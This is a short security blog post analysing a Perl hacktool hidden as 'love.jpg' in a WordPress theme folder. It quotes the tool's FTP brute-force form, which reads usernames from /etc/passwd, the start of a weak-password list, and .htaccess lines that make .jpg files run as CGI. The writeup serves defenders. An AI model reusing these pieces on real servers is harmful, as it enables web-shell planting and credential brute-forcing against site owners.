Hackers will do anything to hide their intentions behind the files they upload to compromised websites. This time, we’ve found a hacktool hidden inside a .jpg file.
As expected, the file was found inside the “images” directory of WordPress’ theme Twenty Twelve and named love.jpg. Lovely, right? By using this tool, the hacker would be able not only to manage, download, and upload files but even try to brute force the FTP users.
Below we can see part of the code used for the brute force option:
#------------------------------------------------------------------------------
# Brute Forcer Form
#------------------------------------------------------------------------------
sub BruteForcerForm
{
my $result="";
$result .= <<END;
<table>
<tr>
<td colspan="2" align="center">
####################################<br>
FTP brute forcer<br>
Note: Only scan from 1 to 3 user<br>
####################################
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="bruteforcer"/>
</td>
</tr>
<tr>
<td>User:<br><textarea rows="18" cols="30" name="user">
END
chop($result .= `less /etc/passwd | cut -d: -f1`);
$result .= <<'END';
</textarea></td>
<td>
Pass:<br>
<textarea rows="18" cols="30" name="pass">test
test1
test2
test3
test123
test12
1test
2test
3test
12test
123test
2012test
test2012
The list of passwords goes on. We can see that the malicious code attempts the most common and weak passwords first to try to catch users who don’t implement strong credentials.
We also found this code inside the .htaccess file located in the same directory:
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .jpg
The hacktool was written as a .cgi file, then disguised as a .jpg file to avoid appearing suspicious inside the image directory. The .htaccess code made sure to run the .jpg file as .cgi, so it could work as intended.